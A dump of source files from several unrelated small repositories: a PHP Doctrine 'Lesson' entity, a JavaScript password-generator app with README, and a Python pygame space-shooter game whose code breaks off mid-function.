$metadata->mapField(array(
'fieldName' => 'id',
'columnName' => 'id',
'type' => 'integer',
'nullable' => false,
'options' =>
array(
'unsigned' => false,
),
'id' => true,
));
$metadata->mapField(array(
'fieldName' => 'nom',
'columnName' => 'nom',
'type' => 'string',
'nullable' => true,
'length' => 100,
'options' =>
array(
'fixed' => false,
),
));
$metadata->mapField(array(
'fieldName' => 'description',
'columnName' => 'description',
'type' => 'string',
'nullable' => true,
'length' => 100,
'options' =>
array(
'fixed' => false,
),
));
$metadata->mapField(array(
'fieldName' => 'nombreInscrit',
'columnName' => 'nombre_inscrit',
'type' => 'integer',
'nullable' => true,
'options' =>
array(
'unsigned' => false,
),
));
$metadata->mapField(array(
'fieldName' => 'horraireDebut',
'columnName' => 'horraire_debut',
'type' => 'date',
'nullable' => true,
));
$metadata->mapField(array(
'fieldName' => 'horraireFin',
'columnName' => 'horraire_fin',
'type' => 'date',
'nullable' => true,
));
$metadata->setIdGeneratorType(ClassMetadataInfo::GENERATOR_TYPE_IDENTITY);<file_sep><?php
namespace AppBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
* Lesson
*
* @ORM\Table(name="Lesson")
* @ORM\Entity
*/
class Lesson
{
/**
* @var string
*
* @ORM\Column(name="nom", type="string", length=100, nullable=true)
*/
private $nom;
/**
* @var string
*
* @ORM\Column(name="description", type="string", length=100, nullable=true)
*/
private $description;
/**
* @var integer
*
* @ORM\Column(name="nombre_inscrit", type="integer", nullable=true)
*/
private $nombreInscrit;
/**
* @var \DateTime
*
* @ORM\Column(name="horraire_debut", type="date", nullable=true)
*/
private $horraireDebut;
/**
* @var \DateTime
*
* @ORM\Column(name="horraire_fin", type="date", nullable=true)
*/
private $horraireFin;
/**
* @var integer
*
* @ORM\Column(name="id", type="integer")
* @ORM\Id
* @ORM\GeneratedValue(strategy="IDENTITY")
*/
private $id;
/**
* Set nom
*
* @param string $nom
*
* @return Lesson
*/
public function setNom($nom)
{
$this->nom = $nom;
return $this;
}
/**
* Get nom
*
* @return string
*/
public function getNom()
{
return $this->nom;
}
/**
* Set description
*
* @param string $description
*
* @return Lesson
*/
public function setDescription($description)
{
$this->description = $description;
return $this;
}
/**
* Get description
*
* @return string
*/
public function getDescription()
{
return $this->description;
}
/**
* Set nombreInscrit
*
* @param integer $nombreInscrit
*
* @return Lesson
*/
public function setNombreInscrit($nombreInscrit)
{
$this->nombreInscrit = $nombreInscrit;
return $this;
}
/**
* Get nombreInscrit
*
* @return integer
*/
public function getNombreInscrit()
{
return $this->nombreInscrit;
}
/**
* Set horraireDebut
*
* @param \DateTime $horraireDebut
*
* @return Lesson
*/
public function setHorraireDebut($horraireDebut)
{
$this->horraireDebut = $horraireDebut;
return $this;
}
/**
* Get horraireDebut
*
* @return \DateTime
*/
public function getHorraireDebut()
{
return $this->horraireDebut;
}
/**
* Set horraireFin
*
* @param \DateTime $horraireFin
*
* @return Lesson
*/
public function setHorraireFin($horraireFin)
{
$this->horraireFin = $horraireFin;
return $this;
}
/**
* Get horraireFin
*
* @return \DateTime
*/
public function getHorraireFin()
{
return $this->horraireFin;
}
/**
* Get id
*
* @return integer
*/
public function getId()
{
return $this->id;
}
}
| 3e9fdfed4aa461dab044870ee344274db2c611d6 | [
"PHP"
] | 3 | PHP | Velk/musquash | 946380a5666c626a881911898056dfc526954aeb | 17fa3c886fa36723686e6041817b9ec7813d5e56 |
refs/heads/master | <repo_name>beenish-mha/Password-Generator<file_sep>/README.md
# Password-Generator
Making this app to generate a random password for the users.
The app can create a strong password that provides greater security.
User can enter its special chracter, numbers , lowercase and uppercase alphabet
and with the click of a button it will generate a new unique password
Copying the random password into the clipboard.<file_sep>/script.js
var generatePassword = document.querySelector(".generatepassword");
var copyToClipboard = document.querySelector(".clipboard");
var yourSecurePassword = document.querySelector(".yoursecurepassword.value");
var specialCheck = /[" !"#$£%&'()*+,-./:;<=>?@[\]^_`{|}~"]+/;
var numbCheck = /[0123456789]/;
var lAlCheck = /[abcdefghijklmnopqrstuvwxyz]/;
var uAlCheck = /[ABCDEFGHIJKLMNOPQRSTUVWXYZ]/;
var specialChar;
var numb;
var lAlpha;
var uAlpha;
var passwordArray = [];
//function to ckeck the special chracter entered and pushing into password array!
function checkSpecial() {
specialChar = prompt('Check your Special Charater and try again');
sc = specialCheck.test(specialChar);
if (sc === false) {
checkSpecial();
}
else {
passwordArray.push(specialChar);
return;
}
}
//function to check the number entered and pushing into password array!
function checkNumb() {
numb = prompt('Check your Number entry and try again');
nc = numbCheck.test(numb);
if (nc === false) {
checkNumb();
}
else {
passwordArray.push(numb);
return;
}
}
//function to check the lower case alphabet and pushing into password array!
function checkLalpha() {
lAlpha = prompt('Please check the lower case entry and try again');
var lac = lAlCheck.test(lAlpha);
if (lac === false) {
checkLalpha();
}
else {
passwordArray.push(lAlpha);
return;
}
}
// function to check the upper case alphabet and pushing into password array!
function checkUalpha() {
uAlpha = prompt('Please check the Upper case entry and try again');
var uac = uAlCheck.test(uAlpha);
if (uac === false) {
checkUalpha();
}
else {
passwordArray.push(uAlpha);
return;
}
}
//function to creat a random password generating with the user input.
function radomPassword(passwordArray) {
var i, x, j;
var arrayLength = passwordArray.length;
for (i = 0; i < arrayLength; i++) {
j = Math.floor(Math.random() * arrayLength);
x = passwordArray[i];
passwordArray[i] = passwordArray[j];
passwordArray[j] = x;
}
return passwordArray;
}
//displaying random password on the page.
function showPassword() {
var newPass = radomPassword(passwordArray);
newPassword = newPass.join("");
document.inputform.txt.value = newPassword;
event.preventDefault();
}
//calling generate button.
generatePassword.addEventListener("click", function () {
alert("length of your password must b between 8 and 128");
//checking user enrty and pusing in an array
specialChar = prompt('Enter any special characters');
if (specialChar === null) {
return;
}
var sc = specialCheck.test(specialChar);
if (sc === false) {
checkSpecial();
}
else {
passwordArray.push(specialChar);
}
numb = prompt('Enter any numbers');
if (numb === null) {
return;
}
var nc = numbCheck.test(numb);
if (nc === false) {
checkNumb();
}
else {
passwordArray.push(numb);
}
lAlpha = prompt('Enter any lower case alpabet');
if (lAlpha === null) {
return;
}
var lac = lAlCheck.test(lAlpha);
if (lac === false) {
checkLalpha();
}
else {
passwordArray.push(lAlpha);
}
uAlpha = prompt('Enter any uppercase alphabet');
if (uAlpha === null) {
return;
}
var uac = uAlCheck.test(uAlpha);
if (uac === false) {
checkUalpha();
}
else {
passwordArray.push(uAlpha);
}
//check the length of array.
var newP = passwordArray.join("");
if (newP.length < 8 || newP.length > 128) {
alert ("please check the length of your password and try again");
}
else {
//calling the function which show result in the readonly text-box.
showPassword();
}
})
//calling copy on clipboard button
copyToClipboard.addEventListener("click", function () {
var copyText = document.inputform.txt.value;
// using the Clipboard API.
navigator.clipboard.writeText(copyText).then();
alert(copyText + " " + "is been added to your clipboard");
})
| f0dbff56abc849fd5434d3ab185e3fffb5ca2afc | [
"Markdown",
"JavaScript"
] | 2 | Markdown | beenish-mha/Password-Generator | 286bc7a2de1c586a97e0d38bb8382fc2f89cc860 | 36736da043d4f4d09d69340b8feb1ded9206b56e |
refs/heads/main | <file_sep># GRA
Granger-<NAME>
Used to combine vis-NIR and pXRF predictions for improved estimation of soil lead content.
Related paper:
<NAME>., <NAME>., <NAME>. and <NAME>., 2020. Integration of vis-NIR and pXRF spectroscopy for rapid measurement of soil lead concentrations. Soil Research, 58(3), pp.247-257.
GRA theory:
<NAME>, <NAME> (1984). Improved methods of combining forecasts. Journal of Forecasting 3(2), 197-204. doi:10.1002/for.3980030207
<file_sep>########################################
## Granger-Ramanathan Model Averaging ##
########################################
# Source: Uta Stockman
# Updated by: <NAME>
# Date: 26/03/21
# Code used for:
# <NAME>., <NAME>., <NAME>. and <NAME>., 2020.
# Integration of vis-NIR and pXRF spectroscopy for rapid measurement of
# soil lead concentrations. Soil Research, 58(3), pp.247-257.
# GRA theory:
# <NAME>, <NAME> (1984). Improved methods of combining forecasts.
# Journal of Forecasting 3(2), 197-204. doi:10.1002/for.3980030207
# In this code averaging with XRF Compton-normalised values with Cubist NIR
rm(list=ls())
setwd(dirname(rstudioapi::getActiveDocumentContext()$path))
load("goof2.RData") # Goodness of fit statistics
##### Read in data #####
Model_aver_c = read.csv("calib.csv")
Model_aver_v = read.csv("valid.csv")
##### Granger-Ramanathan Averaging #####
### Calibration ###
soil_c <- (Model_aver_c$ref_Pb)
# linear regression model
mod.1.c <- lm(Model_aver_c$ref_Pb ~ NIR_bag_mean_Pb + ComptonPb, data=Model_aver_c)
# Call up mod.1.v results to obtain the coefficients:
mod.1.c
weight<-mod.1.c$coefficients
wo<-weight[1]
w_nir<-weight[2]
w_xrf<-weight[3]
# (intercept), NIR_bag_mean_Pb, XRF_bag_mean_rawPb
# These are Wo, W_NIR and W_xrf, respectively
# Note W_NIR and W_XRF do not sum to 1.
# Model averaged predicted Y;
# Y = Wo + (W_nir.X_nir)+(W_xrf.X_xrf)
Y_cal= wo + (w_nir*(Model_aver_c$NIR_bag_mean_Pb)) + (w_xrf*(Model_aver_c$ComptonPb))
#write.csv(cbind(Model_aver_c$ref_Pb, Y_cal), file=export_calib)
isrow <- complete.cases(Y_cal) # find which row has complete record (no NA values)
soil_c <- soil_c[isrow] #specify type of spectra to use for prediction
Y_cal <- Y_cal[isrow] # this represents the soil variable without missing values
gfc.mod.1._predict <- goof2(soil_c, Y_cal)
### Validation ###
#Model
mod.1.v <- lm(Model_aver_v$ref_Pb ~ NIR_bag_mean_Pb+ComptonPb, data=Model_aver_v)
mod.1.v
weight<-mod.1.v$coefficients
wo_v<-weight[1]
w_nir_v<-weight[2]
w_xrf_v<-weight[3]
Y_val= wo_v + (w_nir_v*(Model_aver_v$NIR_bag_mean_Pb)) + (w_xrf_v *(Model_aver_v$ComptonPb))
#write.csv(cbind(Model_aver_v$ref_Pb, Y_val), file=export_valid)
gfv.mod.1._predict <- goof2(Model_aver_v$ref_Pb, Y_val)
gfc.mod.1._predict
gfv.mod.1._predict
| 5de39e79c72747a038f8b177758d98e87817abd4 | [
"Markdown",
"R"
] | 2 | Markdown | lpoz/GRA | a2e81f877cd613e5947e5d2cc25aa6c1eca212d1 | 0d8958aa0e0c4c5c44965698cf7663ce8669d2a8 |
refs/heads/master | <repo_name>Dulet/shmup<file_sep>/star.py
import pygame
from pygame.sprite import Sprite
import random
class Star(Sprite):
def __init__(self, ai_settings, screen, images):
super(Star, self).__init__()
self.screen = screen
self.ai_settings = ai_settings
self.image = images.star
self.rect = self.image.get_rect()
self.rect.x = random.randint(0, ai_settings.screen_width)
self.rect.y = random.randint(-4 * ai_settings.screen_height,
-1 * ai_settings.screen_height)
self.stars_speed = ai_settings.max_stars_speed
self.x = float(self.rect.x)
self.y = float(self.rect.y)
self.speed = random.uniform(1, self.stars_speed)
def blitme(self):
self.screen.blit(self.image, self.rect)
def update(self):
self.y += self.speed
self.rect.y = self.y<file_sep>/powerup.py
import pygame
from pygame.sprite import Sprite
import random
powerups = ['autofire', 'pierce', 'bullet', 'speed', "double", "triple"] # bullet for manual button pressing
weights = [1, 2, 0, 2, 1, 0.7]
class Powerup(Sprite):
def __init__(self, ai_settings, screen, images):
super(Powerup, self).__init__()
self.screen = screen
self.ai_settings = ai_settings
self.type = random.choices(powerups, weights, k=1)
print(self.type)
self.image = images.powerup_images[self.type[0]]
self.rect = self.image.get_rect()
self.rect.x = random.randint(0, ai_settings.screen_width)
self.rect.y = random.randint(-4 * ai_settings.screen_height,
-1 * ai_settings.screen_height)
self.stars_speed = ai_settings.max_stars_speed
self.x = float(self.rect.x)
self.y = float(self.rect.y)
self.speed = random.uniform(1, self.stars_speed)
def blitme(self):
self.screen.blit(self.image, self.rect)
def update(self):
self.y += self.speed
self.rect.y = self.y<file_sep>/alien_invasion.py
import pygame
from settings import Settings
from ship import Ship
from pygame.sprite import Group
from game_stats import GameStats
from button import Button
from scoreboard import Scoreboard
from counter import Counter
from sounds import Sounds
from images import Images
import game_functions as gf
class Background(pygame.sprite.Sprite):
def __init__(self, image_file, location):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load(image_file)
self.rect = self.image.get_rect()
self.rect.left, self.rect.top = location
def run_game():
# create a screen and launch the game
pygame.mixer.pre_init(44100, -16, 16, 2048)
pygame.mixer.init()
pygame.init()
ai_settings = Settings()
screen = pygame.display.set_mode(
(ai_settings.screen_width, ai_settings.screen_height))
pygame.display.set_caption("Alien Invasion")
play_button = Button(ai_settings, screen, "Play")
# make a ship, bullet, alien
sounds = Sounds()
images = Images()
bullets = Group()
aliens = Group()
stars = Group()
powerups = Group()
ship = Ship(ai_settings, screen, images)
stats = GameStats(ai_settings)
sb = Scoreboard(ai_settings, screen, stats)
counter = Counter(ai_settings, screen, stats)
speed = ai_settings.speed
# create a fleet
if stats.game_active:
gf.create_stars(ai_settings, screen, stars)
gf.create_powerup(ai_settings, screen, powerups)
# main game loop
while True:
gf.check_events(ai_settings, screen, stats, play_button, ship, bullets, sounds, images)
gf.update_screen(ai_settings, screen, stats, sb, stars, ship, aliens, bullets,
play_button, counter, powerups, sounds)
if stats.game_active:
gf.update_bullets(ai_settings, screen, ship, aliens, bullets, sb, stats, sounds)
gf.create_stars(ai_settings, screen, stars, images)
gf.create_powerup(ai_settings, screen, powerups, images)
gf.update_aliens(ai_settings, stats, screen, ship, aliens, bullets, images)
gf.update_stars(stars, ai_settings)
gf.update_powerup(powerups, ai_settings)
gf.update_timer(ai_settings)
gf.powerup_check(ship, powerups, ai_settings, images, sounds, stats)
bullets.update()
stars.update()
powerups.update()
aliens.update()
ship.update(bullets, ai_settings, screen, ship, sounds, images)
screen.fill(ai_settings.bg_color)
# screen.blit(BackGround.image, BackGround.rect)
run_game()
<file_sep>/bullet.py
import pygame
from pygame.sprite import Sprite
class BulletBase(Sprite):
"""a class to manage bullets fired from the ship"""
def __init__(self, ai_settings, screen, ship, images):
"""create a bullet"""
super(BulletBase, self).__init__()
self.screen = screen
# create a bullet rect at (0, 0) and then set correct position
self.image = images.bullet
self.rect = self.image.get_rect()
#self.rect = pygame.Rect(0,0, ai_settings.bullet_width,
# ai_settings.bullet_height)
self.rect.centerx = ship.rect.centerx
self.rect.top = ship.rect.top
#self.rect2.centerx = ship.rect.centerx + 50
#self.rect2.top = ship.rect.top
# store the bullet's position as decimal value
self.x = float(self.rect.x)
self.y = float(self.rect.y)
#self.x1 = float(self.rect2.x)
#self.y1 = float(self.rect2.y)
self.color = ai_settings.bullet_color
self.speed_factor = ai_settings.bullet_speed_factor
# randomizes the bullet color each shot
# self.color = random.randint(1, 255), random.randint(1, 255), random.randint(1, 255)
self.color = self.color
self.damage = ai_settings.bullet1_damage
def update(self):
"""move the bullet up the screen"""
# update the decimal pos of bullet
self.x -= self.speed_factor
self.y -= self.speed_factor
#self.x1 -= self.speed_factor
#self.y1 -= self.speed_factor
# update the rectangle pos
self.rect.y = self.y
# used to move vertically
#self.rect.x = self.x
# speeds up the bullet during flight
self.speed_factor += 0
def draw_bullet(self):
"""draw the bullet to screen"""
self.screen.blit(self.image, self.rect)
#(self.image, self.rect2)), doreturn = 1)
class Bullet(BulletBase):
def __init__(self, ai_settings, screen, ship, images):
super().__init__(ai_settings, screen, ship, images)
class Bullet21(BulletBase):
def __init__(self, ai_settings, screen, ship, images):
super().__init__(ai_settings, screen, ship, images)
self.rect.centerx -= 10
self.image = images.bullet1
class Bullet22(BulletBase):
def __init__(self, ai_settings, screen, ship, images):
super().__init__(ai_settings, screen, ship, images)
self.rect.centerx += 10
self.image = images.bullet1
class Bullet31(BulletBase):
def __init__(self, ai_settings, screen, ship, images):
super().__init__(ai_settings, screen, ship, images)
self.image = images.bullet2
# print(self.rect.centerx)
class Bullet32(BulletBase):
def __init__(self, ai_settings, screen, ship, images):
super().__init__(ai_settings, screen, ship, images)
self.rect.x -= self.speed_factor
self.image = images.bullet21
# print(self.rect.centerx)
def update(self):
super().update()
self.rect.x -= self.speed_factor*0.2
class Bullet33(BulletBase):
def __init__(self, ai_settings, screen, ship, images):
super().__init__(ai_settings, screen, ship, images)
self.rect.x += self.speed_factor
self.image = images.bullet22
# print(self.rect.centerx)
def update(self):
super().update()
self.rect.x += self.speed_factor*0.2<file_sep>/settings.py
import game_stats as stats
class Settings():
"""A class to store settings"""
def __init__(self):
"""here settings"""
# screen settings
self.screen_width = 1000
self.screen_height = 800
# alien settings
self.alien_speed = 1.5
self.fleet_direction = 1
self.fleet_drop_speed = 5
self.aliens_allowed = 15
# alien1
self.alien_health = 1
self.alien_points = 50
# alien2
self.alien2_health = 3
self.alien2_points = 75
# background color
self.bg_color = (0, 0, 15)
# bullet level
self.bullet_type = 1
# bullet settings
self.bullet1_damage = 1
self.bullet2_damage = 2
self.bullet3_damage = 3
# bullet statistics
self.bullets_allowed = 99
self.bullet_speed_factor = 20
# bullet aesthetics
self.bullet_width = 1
self.bullet_height = 3
self.bullet_color = 10, 210, 92
# autofire settings
self.fire_cooldown = 0
self.shoot_cooldown = 9
self.autofire = False
self.test = False
# level settings
self.next_level = 1
# score settings
self.alien_points = 50
# time settings
self.frame_count = 0
self.total_seconds = 0
# ship settings
self.ship_invulnerability = 200
self.counter = 0
self.ship_speed_factor = 3
self.max_speed = self.ship_speed_factor*3.5
self.ship_acceleration = 1.1
self.speed = self.ship_speed_factor
self.ship_limit = 2
# stars settings
self.max_stars_speed = 10
self.stars_allowed = 100
# powerup settings
self.powerup_allowed = 3
self.powerup_cooldown = 5
self.powerup_increase = 8
self.autofire_timer = 0
self.pierce_timer = 0
self.pierce = 0
def default_settings(self):
self.next_level = 1
self.alien_speed = 1
self.aliens_allowed = 20
self.alien_speed = 1
self.frame_count = 0
self.bullet_type = 1
self.next_level = 1
self.bullet_speed_factor = 5
self.bullets_allowed = 3
self.alien_points = 50
self.alien2_points = 75<file_sep>/sounds.py
import pygame
VOLUME = 0.2
class Sounds():
def __init__(self):
self.shipshot = pygame.mixer.Sound('sounds/single.wav')
pygame.mixer.Sound.set_volume(self.shipshot, VOLUME)
self.shipshot2 = pygame.mixer.Sound('sounds/double.wav')
pygame.mixer.Sound.set_volume(self.shipshot2, VOLUME)
self.shipshot3 = pygame.mixer.Sound('sounds/triple.wav')
pygame.mixer.Sound.set_volume(self.shipshot3, VOLUME)
self.boom = pygame.mixer.Sound('sounds/boom2.wav')
pygame.mixer.Sound.set_volume(self.boom, VOLUME)
self.hit = pygame.mixer.Sound('sounds/hit.wav')
pygame.mixer.Sound.set_volume(self.hit, VOLUME)
self.extrabullet = pygame.mixer.Sound('sounds/bullet.wav')
pygame.mixer.Sound.set_volume(self.extrabullet, VOLUME)<file_sep>/game_functions.py
import sys
import pygame
import time
from bullet import Bullet, Bullet21, Bullet22, Bullet31, Bullet32, Bullet33
from alien import Alien, Alien2
from star import Star
from powerup import Powerup
clock = pygame.time.Clock()
frame_rate = 60
start_time = 90
def check_events(ai_settings, screen, stats, play_button, ship, bullets, sounds, images):
"""responds to specific keypresses and mouse events"""
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
check_keydown_events(event, ai_settings, screen, ship, bullets, sounds, images)
elif event.type == pygame.KEYUP:
check_keyup_events(event, ship)
elif event.type == pygame.MOUSEBUTTONDOWN:
mouse_x, mouse_y = pygame.mouse.get_pos()
check_play_button(stats, play_button, mouse_x, mouse_y)
def check_play_button(stats, play_button, mouse_x, mouse_y):
if play_button.rect.collidepoint(mouse_x, mouse_y):
stats.game_active = True
pygame.mouse.set_visible(False)
def check_keydown_events(event, ai_settings, screen, ship, bullets, sounds, images):
if event.key == pygame.K_RIGHT:
ship.moving_right = True
elif event.key == pygame.K_LEFT:
ship.moving_left = True
elif event.key == pygame.K_UP:
ship.moving_up = True
elif event.key == pygame.K_DOWN:
ship.moving_down = True
elif event.key == pygame.K_a:
# if ai_settings.autofire: # manual button pressing
ship.fire = True
print(ship.fire)
# else:
# fire_bullet(ai_settings, screen, ship, bullets, sounds, images)
def check_keyup_events(event, ship):
if event.key == pygame.K_RIGHT:
ship.moving_right = False
elif event.key == pygame.K_LEFT:
ship.moving_left = False
elif event.key == pygame.K_UP:
ship.moving_up = False
elif event.key == pygame.K_DOWN:
ship.moving_down = False
elif event.key == pygame.K_a:
ship.fire = False
def update_screen(ai_settings, screen, stats, sb, stars, ship, aliens, bullets, play_button, counter, powerups, sounds):
"""update images on screen and flip on the new screen"""
# redraw all bullets under ship
for bullet in bullets.sprites():
bullet.draw_bullet()
if not stats.game_active:
play_button.draw_button()
sb.show_score()
counter.show_score()
counter.prep_score()
ship.blitme()
stars.draw(screen)
aliens.draw(screen)
powerups.draw(screen)
pygame.display.flip()
level_up(ai_settings)
def fire_bullet(ai_settings, screen, ship, bullets, sounds, images):
if len(bullets) < ai_settings.bullets_allowed:
single_shot = Bullet(ai_settings, screen, ship, images)
double_shot = Bullet21(ai_settings, screen, ship, images), Bullet22(ai_settings, screen, ship, images)
triple_shot = Bullet31(ai_settings, screen, ship, images), Bullet32(ai_settings, screen, ship, images), Bullet33(ai_settings, screen, ship, images)
if ai_settings.bullet_type == 1:
bullets.add(single_shot)
sounds.shipshot.play()
if ai_settings.bullet_type == 2:
bullets.add(double_shot)
sounds.shipshot2.play()
if ai_settings.bullet_type == 3:
bullets.add(triple_shot)
sounds.shipshot3.play()
def update_bullets(ai_settings, screen, ship, aliens, bullets, sb, stats, sounds):
for bullet in bullets.copy():
if bullet.rect.bottom <= 0:
bullets.remove(bullet)
check_bullet_alien_collisions (ai_settings, screen, ship, aliens, bullets, sb, stats, sounds)
# if len(aliens) == 0:
# level_end(ai_settings, screen, ship, aliens, bullets)
def check_bullet_alien_collisions(ai_settings, screen, ship, aliens, bullets, sb, stats, sounds):
if ai_settings.pierce == 0:
hit = pygame.sprite.groupcollide(bullets, aliens, True, False)
else:
hit = pygame.sprite.groupcollide(bullets, aliens, False, False)
for bullet, aliens in hit.items():
for alien in aliens:
alien.damage(1)
if alien.health < 0:
stats.score += alien.points
sb.prep_score()
sounds.boom.play()
else:
sounds.hit.play()
def create_powerup(ai_settings, screen, powerups, images):
number_powerup_x = ai_settings.powerup_allowed
for powerup_amount in range(number_powerup_x):
if len(powerups) < number_powerup_x:
if ai_settings.frame_count/60 >= ai_settings.powerup_cooldown:
powerup = Powerup(ai_settings, screen, images)
powerups.add(powerup)
print("powerup spawned")
ai_settings.powerup_cooldown += ai_settings.powerup_increase
def update_powerup(powerups, ai_settings):
for powerup in powerups.copy():
if powerup.rect.bottom >= ai_settings.screen_height:
powerups.remove(powerup)
def update_stars(stars, ai_settings):
for star in stars.copy():
if star.rect.bottom >= ai_settings.screen_height:
stars.remove(star)
def create_stars(ai_settings, screen, stars, images):
number_stars_x = ai_settings.stars_allowed
for star_amount in range(number_stars_x):
if len(stars) < number_stars_x:
star = Star(ai_settings, screen, images)
stars.add(star)
def create_alien(ai_settings, screen, aliens, images):
number_aliens_x = ai_settings.aliens_allowed
for alien_amount in range(number_aliens_x):
if len(aliens) < number_aliens_x:
alien = Alien(ai_settings, screen, images)
alien2 = Alien2(ai_settings, screen, images)
aliens.add(alien)
aliens.add(alien2)
def check_aliens_bottom (screen, aliens):
screen_rect = screen.get_rect()
for alien in aliens.sprites():
if alien.rect.bottom >= screen_rect.bottom:
aliens.remove(alien)
def update_aliens(ai_settings, stats, screen, ship, aliens, bullets, images):
create_alien(ai_settings, screen, aliens, images)
aliens.update()
if pygame.sprite.spritecollide(ship, aliens, False, pygame.sprite.collide_circle):
ship_hit(ai_settings, stats, screen, ship, aliens, bullets)
print("ooh... ooohh.... *dies*")
check_aliens_bottom(screen, aliens)
def update_timer(ai_settings):
total_seconds = ai_settings.frame_count // frame_rate
ai_settings.frame_count += 1
clock.tick(frame_rate)
return total_seconds
def powerup_check(ship, powerups, ai_settings, images, sounds, stats):
hits = pygame.sprite.spritecollide(ship, powerups, True)
for hit in hits:
if hit.type[0] == 'autofire':
print(ai_settings.shoot_cooldown, ai_settings.fire_cooldown)
if ai_settings.shoot_cooldown > 4:
ai_settings.shoot_cooldown -= 1
else:
stats.score += 500
# if not ai_settings.test:
# ai_settings.test = 1
# ai_settings.shoot_cooldown -= 5
# ai_settings.autofire_timer = int(ai_settings.frame_count/60)
# print(ai_settings.autofire_timer)
if hit.type[0] == 'pierce':
print("pierce bullet")
ai_settings.pierce = 1
ai_settings.pierce_timer = int(ai_settings.frame_count/60)
if hit.type[0] == "bullet":
print("extra bullet")
sounds.extrabullet.play()
ai_settings.bullets_allowed += 1
if hit.type[0] == "speed":
print("extra bullet speed")
ai_settings.bullet_speed_factor += 0.5
if hit.type[0] == "double":
print("double shot")
if ai_settings.bullet_type == 2:
ai_settings.bullets_allowed += 2
ai_settings.bullet_type = 2
if hit.type[0] == "triple":
print("triple shot")
if ai_settings.bullet_type == 3:
ai_settings.bullets_allowed += 3
ai_settings.bullet_type = 3
# if ai_settings.test == 1:
# if int(ai_settings.frame_count / 60) - ai_settings.autofire_timer > 5:
# print("autofire ends")
# ai_settings.test = 0
# ai_settings.shoot_cooldown += 5
if ai_settings.pierce == 1:
images.pierce()
if int(ai_settings.frame_count / 60) - ai_settings.pierce_timer > 5:
print("pierce ends")
ai_settings.pierce = 0
images.default()
def level_up(ai_settings):
ai_settings.meme = int(ai_settings.frame_count/1200)
if ai_settings.meme == ai_settings.next_level:
print("next level")
ai_settings.alien_points += int((ai_settings.next_level ** 1.2))
ai_settings.alien2_points += int((ai_settings.next_level ** 1.2))
ai_settings.aliens_allowed += 5
ai_settings.alien_speed += 0.20
ai_settings.next_level = ai_settings.next_level + 1
def ship_hit(ai_settings, stats, screen, ship, aliens, bullets):
if stats.ships_left > 0:
stats.ships_left -= 1
print("lives left:" + str(stats.ships_left))
aliens.empty()
bullets.empty()
time.sleep(0.5)
if ai_settings.ship_invulnerability > ai_settings.counter:
ai_settings.counter += 1
else:
stats.game_active = False
pygame.mouse.set_visible(True)
stats.ships_left = ai_settings.ship_limit
aliens.empty()
bullets.empty()
ai_settings.default_settings()
print("game over, score: " + str(stats.score))
stats.score -= stats.score
ship.center_ship()
<file_sep>/ship.py
import game_functions as gf
import pygame
import pygame
RED = (255, 0, 0)
class Ship:
def __init__(self, ai_settings, screen, images):
"""get a ship and set its position"""
self.screen = screen
self.ai_settings = ai_settings
# load the ship image and get the rectangle of it
self.image = images.ship
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
# draw the ship at the bottom center of the screen
self.rect.centerx = self.screen_rect.centerx
self.rect.bottom = self.screen_rect.bottom
self.radius = 25
self.center = float(self.rect.centerx)
self.bottom = float(self.rect.bottom)
# movement flags
self.moving_right = False
self.moving_left = False
self.moving_up = False
self.moving_down = False
self.fire = False # autofire
def update(self, bullets, ai_settings, screen, ship, sounds, images):
"""update the ship movement depending on keypress"""
global speed
if self.moving_right and self.rect.right < self.screen_rect.right:
if speed <= ai_settings.max_speed:
speed *= ai_settings.ship_acceleration
self.center += speed
elif self.moving_left and self.rect.left > 0:
if speed <= ai_settings.max_speed:
speed *= ai_settings.ship_acceleration
self.center -= speed
elif self.moving_up and self.rect.top > self.screen_rect.top:
if speed <= ai_settings.max_speed:
speed *= ai_settings.ship_acceleration
self.rect.centery -= speed
elif self.moving_down and self.screen_rect.bottom > self.rect.bottom:
if speed <= ai_settings.max_speed:
speed *= ai_settings.ship_acceleration
self.rect.centery += speed
else:
speed = ai_settings.ship_speed_factor
# autofire
if self.fire and len(bullets) < ai_settings.bullets_allowed:
if ai_settings.fire_cooldown == ai_settings.shoot_cooldown:
ai_settings.fire_cooldown = 0
gf.fire_bullet(ai_settings, screen, ship, bullets, sounds, images)
else:
ai_settings.fire_cooldown = ai_settings.fire_cooldown + 1
self.rect.centerx = self.center
def center_ship(self):
self.center = self.screen_rect.centerx
self.rect.bottom = self.screen_rect.bottom
def blitme(self):
"""draw the ship at the created location"""
self.screen.blit(self.image, self.rect)
pygame.draw.circle(self.image, (255, 0, 255), self.rect.center, 25)
<file_sep>/images.py
import pygame
class Images():
def __init__(self):
self.bullet = pygame.image.load("images/bullet1.png")
self.bullet1 = pygame.image.load("images/bullet2.png")
self.bullet2 = pygame.image.load("images/bullet3.png")
self.bullet21 = pygame.image.load("images/bullet32.png")
self.bullet22 = pygame.image.load("images/bullet33.png")
self.ship = pygame.image.load('images/ship.png')
self.alien = pygame.image.load("images/alieneasy2.1.png")
self.alien2 = pygame.image.load("images/alien2.1.png")
self.star = pygame.image.load("images/star3.png")
self.powerup_images = {}
self.powerup_images["speed"] = pygame.image.load("images/bulletspeed.png")
self.powerup_images["bullet"] = pygame.image.load("images/bullet.png")
self.powerup_images["autofire"] = pygame.image.load('images/autofire.png')
self.powerup_images["pierce"] = pygame.image.load('images/pierce.png')
self.powerup_images["double"] = pygame.image.load("images/double.png")
self.powerup_images["triple"] = pygame.image.load("images/triple.png")
def default(self):
self.bullet = pygame.image.load("images/bullet1.png")
self.bullet1 = pygame.image.load("images/bullet2.png")
self.bullet2 = pygame.image.load("images/bullet3.png")
self.bullet21 = pygame.image.load("images/bullet32.png")
self.bullet22 = pygame.image.load("images/bullet33.png")
def pierce(self):
self.bullet = pygame.image.load("images/laserred.png")
self.bullet1 = pygame.image.load("images/laserred.png")
self.bullet2 = pygame.image.load("images/laserred.png")
self.bullet21 = pygame.image.load("images/laserred1.png")
self.bullet22 = pygame.image.load("images/laserred2.png")<file_sep>/counter.py
import pygame.font
class Counter():
def __init__(self, ai_settings, screen, stats):
self.screen = screen
self.screen_rect = screen.get_rect()
self.ai_settings = ai_settings
self.stats = stats
self.text_color = (204, 24, 63)
self.font = pygame.font.Font('fonts/kenvector_future_thin2.ttf', 26)
self.prep_score()
def prep_score(self):
"""Turn the score into a rendered image."""
seconds = int(self.ai_settings.frame_count/60)
